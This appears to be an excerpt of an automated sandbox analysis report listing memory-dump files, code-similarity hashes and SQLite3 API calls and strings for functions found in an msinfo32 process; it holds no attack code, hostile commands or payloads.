                                                                                                              • Associated: 0000000C.00000002.874598082.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874619896.0000000061E97000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874626124.0000000061E99000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874634821.0000000061EAB000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874641242.0000000061EAC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874647132.0000000061EAF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874652822.0000000061EB2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874658816.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: a93de50c598dbb1b33a176bbe8ed0008f94d3f75d8cf630fecffdb0bbd3989cd
                                                                                                              • Instruction ID: c522bc388e0ba9ac8844ce6354786ec7c9fc39114b924ed26ac21fe5c28efd58
                                                                                                              • Opcode Fuzzy Hash: a93de50c598dbb1b33a176bbe8ed0008f94d3f75d8cf630fecffdb0bbd3989cd
                                                                                                              • Instruction Fuzzy Hash: 90E0EC763092085FBB40CD99ACD0A2677DAF79812CB24C136ED18CB305EA32D9104660
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              • Associated: 0000000C.00000002.874598082.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874619896.0000000061E97000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874626124.0000000061E99000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874634821.0000000061EAB000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874641242.0000000061EAC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874647132.0000000061EAF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874652822.0000000061EB2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874658816.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 0cd79c278022c2af276d7ad662afd0b40ecf5fd40577ade0c20f6c2bf6da0c7d
                                                                                                              • Instruction ID: 9e6e90ec920229668782eb68a2098b7b7fed8534ec208d789a627608c88741d7
                                                                                                              • Opcode Fuzzy Hash: 0cd79c278022c2af276d7ad662afd0b40ecf5fd40577ade0c20f6c2bf6da0c7d
                                                                                                              • Instruction Fuzzy Hash: 6CD042B450530DABDB00CF05D8C099ABBA8FB08364F50C119ED1847341C371E9508AA0
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              • Associated: 0000000C.00000002.874598082.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874619896.0000000061E97000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874626124.0000000061E99000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874634821.0000000061EAB000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874641242.0000000061EAC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874647132.0000000061EAF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874652822.0000000061EB2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874658816.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: e41ed7868823feecbe9f7a8037c94bafbb7f30954735038eee146dcf54c940b3
                                                                                                              • Instruction ID: 4248dcf0bf4af482870b83a5a4203603e910368983d5090c3a7f3c4823f2e081
                                                                                                              • Opcode Fuzzy Hash: e41ed7868823feecbe9f7a8037c94bafbb7f30954735038eee146dcf54c940b3
                                                                                                              • Instruction Fuzzy Hash: 57D042B450530DABDB00CF05D8C599ABBA8FB08264F50C119ED1847341C371E9508AA0
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              • Associated: 0000000C.00000002.874598082.0000000061E00000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                              • Associated: 0000000C.00000002.874619896.0000000061E97000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                              • Associated: 0000000C.00000002.874626124.0000000061E99000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                              • Associated: 0000000C.00000002.874634821.0000000061EAB000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                              • Associated: 0000000C.00000002.874641242.0000000061EAC000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                              • Associated: 0000000C.00000002.874647132.0000000061EAF000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                              • Associated: 0000000C.00000002.874652822.0000000061EB2000.00000008.00000001.01000000.0000000C.sdmp
                                                                                                              • Associated: 0000000C.00000002.874658816.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 74bd47e5a56efec07af792e7fa13408cba0d8239387265c8b2ef29a2ad9e996c
                                                                                                              • Instruction ID: 594a02a3e34eb1d4e321d7026c08e77dcf265e647233ca163f9c34190aad7892
                                                                                                              • Opcode Fuzzy Hash: 74bd47e5a56efec07af792e7fa13408cba0d8239387265c8b2ef29a2ad9e996c
                                                                                                              • Instruction Fuzzy Hash: 4AC012303443088BEB40CAAED440A6633E8BB04A25F50C060F84CCB700DA30FA218688
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 40cad0428ba2cec2f3835856280400d4fd42dbc754fd2a6d6e7cded720f8f0bd
                                                                                                              • Instruction ID: 50be5d58a59c62816cb7a21ca9e116e9e531976ec67ec3a9bf50fa4ed4933468
                                                                                                              • Opcode Fuzzy Hash: 40cad0428ba2cec2f3835856280400d4fd42dbc754fd2a6d6e7cded720f8f0bd
                                                                                                              • Instruction Fuzzy Hash: D4B092206146098AAB08CE989480E7777AEBBD8E09728C465A81C8AA09E731E891D2C0
                                                                                                              APIs
                                                                                                              • sqlite3_str_appendall.SQLITE3 ref: 61E322BF
                                                                                                              • sqlite3_str_appendf.SQLITE3 ref: 61E322FD
                                                                                                              • sqlite3_str_appendf.SQLITE3 ref: 61E32328
                                                                                                              • sqlite3_str_append.SQLITE3 ref: 61E32488
                                                                                                              • sqlite3_str_appendf.SQLITE3 ref: 61E324A0
                                                                                                              • sqlite3_str_append.SQLITE3 ref: 61E324DF
                                                                                                              • sqlite3_str_append.SQLITE3 ref: 61E3255B
                                                                                                              • sqlite3_str_appendf.SQLITE3 ref: 61E32590
                                                                                                              • sqlite3_str_append.SQLITE3 ref: 61E3260C
                                                                                                              Strings
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_str_appendsqlite3_str_appendf$sqlite3_str_appendall
                                                                                                              • String ID: %s=?$0$<expr>$>? AND rowid<$ANY(%s)$AUTOMATIC COVERING INDEX$AUTOMATIC PARTIAL COVERING INDEX$COVERING INDEX %s$INDEX %s$PRIMARY KEY$SCAN$SEARCH$d$rowid
                                                                                                              • API String ID: 3937484358-3012697695
                                                                                                              • Opcode ID: 6882c50c0b1b6850b709cce18eece3333a4564d841f4222bba26dcc21398b610
                                                                                                              • Instruction ID: 1b3482640f2a3b0896619f5f743b90c78d64ed0cefaad1a863c96eca3e014793
                                                                                                              • Opcode Fuzzy Hash: 6882c50c0b1b6850b709cce18eece3333a4564d841f4222bba26dcc21398b610
                                                                                                              • Instruction Fuzzy Hash: 41C128B4D093259BDB108F24C99175ABBF1AFD5308F21C8A9D88C9B391D374D981CF82
                                                                                                              APIs
                                                                                                              • sqlite3_free.SQLITE3 ref: 61E3D25E
                                                                                                              • sqlite3_snprintf.SQLITE3 ref: 61E3D28F
                                                                                                                • Part of subcall function 61E2245A: sqlite3_vsnprintf.SQLITE3 ref: 61E2247B
                                                                                                              • sqlite3_free.SQLITE3 ref: 61E3D3D3
                                                                                                              • sqlite3_free.SQLITE3 ref: 61E3D410
                                                                                                              • sqlite3_free.SQLITE3 ref: 61E3D44B
                                                                                                              • sqlite3_snprintf.SQLITE3 ref: 61E3D47D
                                                                                                              • sqlite3_randomness.SQLITE3 ref: 61E3D499
                                                                                                              Strings
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_free$sqlite3_snprintf$sqlite3_randomnesssqlite3_vsnprintf
                                                                                                              • String ID: etilqs_$winGetTempname1$winGetTempname2$winGetTempname3$winGetTempname4$winGetTempname5
                                                                                                              • API String ID: 3041771859-3409217566
                                                                                                              • Opcode ID: a9ee31df8bdb1fa04bebee60734a2ef004e3fe092d686bf276967802286417f9
                                                                                                              • Instruction ID: 61fd35cb51673c58c57d358b30ef44a57cc73a86349e2d2918984235d290bf37
                                                                                                              • Opcode Fuzzy Hash: a9ee31df8bdb1fa04bebee60734a2ef004e3fe092d686bf276967802286417f9
                                                                                                              • Instruction Fuzzy Hash: F3817F74908B568FD7009F78899476EBBE1BFC5308FA4C92ED4898B345E778C842DB42
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_free$sqlite3_snprintf$sqlite3_mutex_entersqlite3_win32_is_nt
                                                                                                              • String ID: \$winFullPathname1$winFullPathname2$winFullPathname3$winFullPathname4
                                                                                                              • API String ID: 3752053736-2111127023
                                                                                                              • Opcode ID: e7c95a9d01a67d31522d9c6d3be1f12bbe997f9ad62422dacd1ce9c28830c883
                                                                                                              • Instruction ID: 2e3191e42838f75f66efd40bf58524408cd86e6b59767091f50ac708f5baf3db
                                                                                                              • Opcode Fuzzy Hash: e7c95a9d01a67d31522d9c6d3be1f12bbe997f9ad62422dacd1ce9c28830c883
                                                                                                              • Instruction Fuzzy Hash: F97149709487458FD700DF69C59469EBBF1AF89348F24C82EE889CB359E738C5458F82
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_free$sqlite3_malloc64sqlite3_mprintf$sqlite3_snprintf$sqlite3_mutex_entersqlite3_mutex_leavesqlite3_strnicmp
                                                                                                              • String ID: .$sqlite3_extension_init$te3_
                                                                                                              • API String ID: 2803375525-613441610
                                                                                                              • Opcode ID: b06ba8bf46ed4125aadabf994ea0b99f438a17ff1eb6aaed0f6d5427b6d726d5
                                                                                                              • Instruction ID: 457eb6b65f3326cc958bc39251aab57efa386546f4dd5fbd1c786671b86f3213
                                                                                                              • Opcode Fuzzy Hash: b06ba8bf46ed4125aadabf994ea0b99f438a17ff1eb6aaed0f6d5427b6d726d5
                                                                                                              • Instruction Fuzzy Hash: B2C1E5B4A056169FDB00DFA9C484A9EBBF0BF88314F24C529E8999B314DB34D841CB91
                                                                                                              APIs
                                                                                                              • sqlite3_stricmp.SQLITE3 ref: 61E23EBA
                                                                                                              • sqlite3_value_numeric_type.SQLITE3 ref: 61E23EC6
                                                                                                              • sqlite3_value_int.SQLITE3 ref: 61E23ED3
                                                                                                              • sqlite3_stricmp.SQLITE3 ref: 61E23EFB
                                                                                                              • sqlite3_value_numeric_type.SQLITE3 ref: 61E23F07
                                                                                                              • sqlite3_value_int.SQLITE3 ref: 61E23F16
                                                                                                              • sqlite3_stricmp.SQLITE3 ref: 61E23F36
                                                                                                              • sqlite3_value_numeric_type.SQLITE3 ref: 61E23F42
                                                                                                              • sqlite3_value_int.SQLITE3 ref: 61E23F51
                                                                                                              • sqlite3_stricmp.SQLITE3 ref: 61E23F7D
                                                                                                              • sqlite3_value_numeric_type.SQLITE3 ref: 61E23F89
                                                                                                              • sqlite3_value_int.SQLITE3 ref: 61E23F97
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_stricmpsqlite3_value_intsqlite3_value_numeric_type
                                                                                                              • String ID:
                                                                                                              • API String ID: 2723203140-0
                                                                                                              • Opcode ID: ca789292387b7a611cfcb16e5917548ea30acae9f6698ebd3cc457044bcea27b
                                                                                                              • Instruction ID: 079c009047b4c6e22ff85497e6309bf0f466190783cb9558c195e2563b8ac34b
                                                                                                              • Opcode Fuzzy Hash: ca789292387b7a611cfcb16e5917548ea30acae9f6698ebd3cc457044bcea27b
                                                                                                              • Instruction Fuzzy Hash: 5F411EB0508B868AD300AF658991A5EBBF5FF8434CF35CD2EC4958B714E739D8819F42
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              • Associated: 0000000C.00000002.874598082.0000000061E00000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                              • Associated: 0000000C.00000002.874619896.0000000061E97000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                              • Associated: 0000000C.00000002.874626124.0000000061E99000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                              • Associated: 0000000C.00000002.874634821.0000000061EAB000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                              • Associated: 0000000C.00000002.874641242.0000000061EAC000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                              • Associated: 0000000C.00000002.874647132.0000000061EAF000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                              • Associated: 0000000C.00000002.874652822.0000000061EB2000.00000008.00000001.01000000.0000000C.sdmp
                                                                                                              • Associated: 0000000C.00000002.874658816.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: memcmp$sqlite3_mprintf$sqlite3_malloc64$sqlite3_freesqlite3_vfs_find
                                                                                                              • String ID: @$access$cache
                                                                                                              • API String ID: 1538829708-1361544076
                                                                                                              APIs
                                                                                                              • sqlite3_free.SQLITE3 ref: 61E3D95E
                                                                                                                • Part of subcall function 61E09D7B: sqlite3_mutex_enter.SQLITE3 ref: 61E09D9A
                                                                                                              • sqlite3_snprintf.SQLITE3 ref: 61E3D98A
                                                                                                              • sqlite3_mutex_enter.SQLITE3 ref: 61E3D997
                                                                                                              • sqlite3_mutex_alloc.SQLITE3 ref: 61E3D9ED
                                                                                                              • sqlite3_uri_boolean.SQLITE3 ref: 61E3DA15
                                                                                                              • sqlite3_free.SQLITE3 ref: 61E3DAAA
                                                                                                              • sqlite3_mutex_enter.SQLITE3 ref: 61E3DAC9
                                                                                                              • sqlite3_mutex_leave.SQLITE3 ref: 61E3DD1A
                                                                                                              Strings
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_mutex_enter$sqlite3_free$sqlite3_mutex_allocsqlite3_mutex_leavesqlite3_snprintfsqlite3_uri_boolean
                                                                                                              • String ID: winOpenShm$winShmMap1$winShmMap2$winShmMap3
                                                                                                              • API String ID: 1420044521-1629717226
                                                                                                              APIs
                                                                                                              • sqlite3_result_error.SQLITE3 ref: 61E4AB3E
                                                                                                              • sqlite3_free.SQLITE3 ref: 61E4AB49
                                                                                                                • Part of subcall function 61E09D7B: sqlite3_mutex_enter.SQLITE3 ref: 61E09D9A
                                                                                                              • sqlite3_mprintf.SQLITE3 ref: 61E4AB27
                                                                                                                • Part of subcall function 61E386AE: sqlite3_initialize.SQLITE3 ref: 61E386B4
                                                                                                                • Part of subcall function 61E386AE: sqlite3_vmprintf.SQLITE3 ref: 61E386CE
                                                                                                              • sqlite3_value_text.SQLITE3 ref: 61E4AB67
                                                                                                              • sqlite3_malloc64.SQLITE3 ref: 61E4AB9E
                                                                                                              • sqlite3_result_error_nomem.SQLITE3 ref: 61E4ABAF
                                                                                                              Strings
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_freesqlite3_initializesqlite3_malloc64sqlite3_mprintfsqlite3_mutex_entersqlite3_result_errorsqlite3_result_error_nomemsqlite3_value_textsqlite3_vmprintf
                                                                                                              • String ID: fts5_expr$fts5_expr_tcl
                                                                                                              • API String ID: 451670718-1556133414
                                                                                                              APIs
                                                                                                              • sqlite3_str_append.SQLITE3 ref: 61E31392
                                                                                                              • sqlite3_str_append.SQLITE3 ref: 61E313A8
                                                                                                              • sqlite3_str_append.SQLITE3 ref: 61E313ED
                                                                                                              • sqlite3_str_appendf.SQLITE3 ref: 61E31417
                                                                                                                • Part of subcall function 61E289E8: sqlite3_str_vappendf.SQLITE3 ref: 61E28A02
                                                                                                              • sqlite3_str_append.SQLITE3 ref: 61E3147A
                                                                                                              • sqlite3_str_appendf.SQLITE3 ref: 61E31520
                                                                                                              • sqlite3_str_appendf.SQLITE3 ref: 61E315C8
                                                                                                              • sqlite3_str_appendf.SQLITE3 ref: 61E31600
                                                                                                              • sqlite3_str_append.SQLITE3 ref: 61E31625
                                                                                                              • sqlite3_str_appendf.SQLITE3 ref: 61E3165E
                                                                                                              • sqlite3_str_append.SQLITE3 ref: 61E3167E
                                                                                                              • sqlite3_str_reset.SQLITE3 ref: 61E3169A
                                                                                                              Strings
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_str_append$sqlite3_str_appendf$sqlite3_str_resetsqlite3_str_vappendf
                                                                                                              • String ID: d
                                                                                                              • API String ID: 4035452181-2564639436
                                                                                                              APIs
                                                                                                              • sqlite3_str_append.SQLITE3 ref: 61E20E81
                                                                                                              • sqlite3_str_append.SQLITE3 ref: 61E20E9E
                                                                                                              • sqlite3_str_append.SQLITE3 ref: 61E20EC3
                                                                                                              • sqlite3_str_appendall.SQLITE3 ref: 61E20F01
                                                                                                              • sqlite3_str_append.SQLITE3 ref: 61E20F24
                                                                                                              • sqlite3_str_append.SQLITE3 ref: 61E20F3B
                                                                                                              • sqlite3_str_append.SQLITE3 ref: 61E20F58
                                                                                                              • sqlite3_str_append.SQLITE3 ref: 61E20F7A
                                                                                                              • sqlite3_str_append.SQLITE3 ref: 61E20F93
                                                                                                              Strings
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_str_append$sqlite3_str_appendall
                                                                                                              • String ID: (,)?$<expr>$rowid
                                                                                                              • API String ID: 851024535-569625528
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_result_error$sqlite3_value_bytes$sqlite3_db_configsqlite3_freesqlite3_mprintfsqlite3_result_blobsqlite3_value_blobsqlite3_value_text
                                                                                                              • String ID: out of memory
                                                                                                              • API String ID: 2048698484-2599737071
                                                                                                              APIs
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_value_text$sqlite3_value_int$sqlite3_mallocsqlite3_result_error
                                                                                                              • String ID:
                                                                                                              • API String ID: 3802728871-0
                                                                                                              • Opcode ID: 191db6603ffe1a60367700dd186a6e8e36bc68dc8bef97921a5741047babf1cd
                                                                                                              • Instruction ID: 7a7bce942458b3c38004078f3a5a24b75502cc29e88cd778c924325fb2f6d660
                                                                                                              • Opcode Fuzzy Hash: 191db6603ffe1a60367700dd186a6e8e36bc68dc8bef97921a5741047babf1cd
                                                                                                              • Instruction Fuzzy Hash: 83126D74D04729CFDB60DF68C984B8DBBF1BF88315F1085AAE899A7241E7349A85CF11
                                                                                                              APIs
                                                                                                                • Part of subcall function 61E28259: sqlite3_log.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 61E2829D
                                                                                                              • sqlite3_mutex_enter.SQLITE3 ref: 61E63073
                                                                                                              • sqlite3_prepare_v2.SQLITE3 ref: 61E630AE
                                                                                                              • sqlite3_step.SQLITE3 ref: 61E630E5
                                                                                                              • sqlite3_errmsg.SQLITE3 ref: 61E632AE
                                                                                                              • sqlite3_mutex_leave.SQLITE3 ref: 61E632ED
                                                                                                                • Part of subcall function 61E25225: sqlite3_log.SQLITE3 ref: 61E2524E
                                                                                                              Strings
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_log$sqlite3_errmsgsqlite3_mutex_entersqlite3_mutex_leavesqlite3_prepare_v2sqlite3_step
                                                                                                              • String ID: d$d
                                                                                                              • API String ID: 2909166478-195624457
                                                                                                              • Opcode ID: ae114b03031086fffb197695af07c18c9801f1b39ea4c6aa68537030f1fd8784
                                                                                                              • Instruction ID: eed49135d479217e734fff9b53e378a9a980ca02413c9c59ef74dd59a0246b24
                                                                                                              • Opcode Fuzzy Hash: ae114b03031086fffb197695af07c18c9801f1b39ea4c6aa68537030f1fd8784
                                                                                                              • Instruction Fuzzy Hash: 38811C70A44249DBDB00DFE9C48479EBBF5AF89718F64C42EE86897340D778D845CB91
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Similarity
                                                                                                              • API ID: strncmp
                                                                                                              • String ID: -$-$0$]$false$null$true$}
                                                                                                              • API String ID: 1114863663-1443276563
                                                                                                              • Opcode ID: 50bb00445f65cda45c1b2c4f4639e90f90b356f5c8958f1287420796bc2cbbf9
                                                                                                              • Instruction ID: c04a123919a35016347dd75afbb87d20923b75c8e0a00e01049f01834856e81d
                                                                                                              • Opcode Fuzzy Hash: 50bb00445f65cda45c1b2c4f4639e90f90b356f5c8958f1287420796bc2cbbf9
                                                                                                              • Instruction Fuzzy Hash: BCD1D770A0827A8EE715CFA9C494399BBF1AFCA31CF68C65AD0919B385D339D447CB11
                                                                                                              APIs
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_value_bytessqlite3_value_text$memcmpsqlite3_result_error_toobig
                                                                                                              • String ID:
                                                                                                              • API String ID: 3428878466-0
                                                                                                              • Opcode ID: fe6494e6d8ed98ee2b1f61f0973afebe522055ffd6ad81ba5f2b1579d9393009
                                                                                                              • Instruction ID: 2f3ec3f6e137691abcf94ce4cde592ed2cb18cc8f19a215ea8a8e83e2020f562
                                                                                                              • Opcode Fuzzy Hash: fe6494e6d8ed98ee2b1f61f0973afebe522055ffd6ad81ba5f2b1579d9393009
                                                                                                              • Instruction Fuzzy Hash: 5881E4B5E042598FCB01DFA9D480A9DBBF1BF88324F24852AE855EB355E735E841CF50
                                                                                                              APIs
                                                                                                                • Part of subcall function 61E0A352: sqlite3_free.SQLITE3 ref: 61E0A361
                                                                                                                • Part of subcall function 61E0A352: sqlite3_free.SQLITE3 ref: 61E0A36C
                                                                                                              • sqlite3_value_text.SQLITE3 ref: 61E3C606
                                                                                                              • sqlite3_value_bytes.SQLITE3 ref: 61E3C619
                                                                                                              • sqlite3_malloc64.SQLITE3 ref: 61E3C62E
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_free$sqlite3_malloc64sqlite3_value_bytessqlite3_value_text
                                                                                                              • String ID:
                                                                                                              • API String ID: 3723316075-0
                                                                                                              • Opcode ID: 2854da0b75f21c9bb25846760877c026f8eb55732051456ca03b5aa2582b231c
                                                                                                              • Instruction ID: 2ffe35a60403694682be074067f522adf7917a1ddb5b097814a6810ad4a4910b
                                                                                                              • Opcode Fuzzy Hash: 2854da0b75f21c9bb25846760877c026f8eb55732051456ca03b5aa2582b231c
                                                                                                              • Instruction Fuzzy Hash: 86816CB4A042658FDB04DF79C48479ABBF0BF88318F25C46AD8598B365D738E841CF51
                                                                                                              APIs
                                                                                                              • sqlite3_free.SQLITE3 ref: 61E4C653
                                                                                                                • Part of subcall function 61E09D7B: sqlite3_mutex_enter.SQLITE3 ref: 61E09D9A
                                                                                                              • sqlite3_free.SQLITE3 ref: 61E4C65E
                                                                                                              • sqlite3_reset.SQLITE3 ref: 61E4C68D
                                                                                                              • sqlite3_finalize.SQLITE3 ref: 61E4C697
                                                                                                                • Part of subcall function 61E49B16: sqlite3_log.SQLITE3 ref: 61E49B3A
                                                                                                              • sqlite3_finalize.SQLITE3 ref: 61E4C6A8
                                                                                                              • sqlite3_free.SQLITE3 ref: 61E4C6B0
                                                                                                              • sqlite3_free.SQLITE3 ref: 61E4C6E1
                                                                                                              • sqlite3_finalize.SQLITE3 ref: 61E4C6EE
                                                                                                              • sqlite3_free.SQLITE3 ref: 61E4C6F9
                                                                                                              • sqlite3_free.SQLITE3 ref: 61E4C70A
                                                                                                              • sqlite3_free.SQLITE3 ref: 61E4C715
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_free$sqlite3_finalize$sqlite3_logsqlite3_mutex_entersqlite3_reset
                                                                                                              • String ID:
                                                                                                              • API String ID: 3265072988-0
                                                                                                              • Opcode ID: 918f1d5fcc2ed3141946f0bfc0111dfbf4f263aeada9f6e905b24409e27a2b98
                                                                                                              • Instruction ID: bbd227a7e25c7b822b687509d316af0af9533b1c0ae95f80fad99d6b85bf1eed
                                                                                                              • Opcode Fuzzy Hash: 918f1d5fcc2ed3141946f0bfc0111dfbf4f263aeada9f6e905b24409e27a2b98
                                                                                                              • Instruction Fuzzy Hash: C3312770304B429FD700AFA9D1C4659BBE0BF88758F61C86DC9858B714E734F8A9CB92
                                                                                                              APIs
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_free
                                                                                                              • String ID:
                                                                                                              • API String ID: 2313487548-0
                                                                                                              • Opcode ID: f0b11a29783efd7e7c8c14ce528e1fd951f247dcb29d9c1997e282895af9f18b
                                                                                                              • Instruction ID: 33d95616677f911cfef8c4a721762760e74432c08dfc9d1c94395672f97c874b
                                                                                                              • Opcode Fuzzy Hash: f0b11a29783efd7e7c8c14ce528e1fd951f247dcb29d9c1997e282895af9f18b
                                                                                                              • Instruction Fuzzy Hash: E3115B74644B418BCB40AF78C4C4819FBE4EF48755B52999EDC8A8B31EE738D8A1CB51
                                                                                                              APIs
                                                                                                                • Part of subcall function 61E4B2A7: sqlite3_blob_close.SQLITE3 ref: 61E4B2CA
                                                                                                              • sqlite3_finalize.SQLITE3 ref: 61E4B586
                                                                                                                • Part of subcall function 61E49B16: sqlite3_log.SQLITE3 ref: 61E49B3A
                                                                                                              • sqlite3_finalize.SQLITE3 ref: 61E4B591
                                                                                                              • sqlite3_finalize.SQLITE3 ref: 61E4B59C
                                                                                                                • Part of subcall function 61E49B16: sqlite3_mutex_enter.SQLITE3 ref: 61E49B59
                                                                                                              • sqlite3_finalize.SQLITE3 ref: 61E4B5A7
                                                                                                              • sqlite3_finalize.SQLITE3 ref: 61E4B5B2
                                                                                                              • sqlite3_finalize.SQLITE3 ref: 61E4B5BD
                                                                                                              • sqlite3_finalize.SQLITE3 ref: 61E4B5C8
                                                                                                              • sqlite3_finalize.SQLITE3 ref: 61E4B5D3
                                                                                                              • sqlite3_finalize.SQLITE3 ref: 61E4B5DE
                                                                                                              • sqlite3_free.SQLITE3 ref: 61E4B5E9
                                                                                                                • Part of subcall function 61E09D7B: sqlite3_mutex_enter.SQLITE3 ref: 61E09D9A
                                                                                                              • sqlite3_free.SQLITE3 ref: 61E4B5F1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              • Associated: 0000000C.00000002.874598082.0000000061E00000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                              • Associated: 0000000C.00000002.874619896.0000000061E97000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                              • Associated: 0000000C.00000002.874626124.0000000061E99000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                              • Associated: 0000000C.00000002.874634821.0000000061EAB000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                              • Associated: 0000000C.00000002.874641242.0000000061EAC000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                              • Associated: 0000000C.00000002.874647132.0000000061EAF000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                              • Associated: 0000000C.00000002.874652822.0000000061EB2000.00000008.00000001.01000000.0000000C.sdmp
                                                                                                              • Associated: 0000000C.00000002.874658816.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_finalize$sqlite3_freesqlite3_mutex_enter$sqlite3_blob_closesqlite3_log
                                                                                                              • String ID:
                                                                                                              • API String ID: 4171551786-0
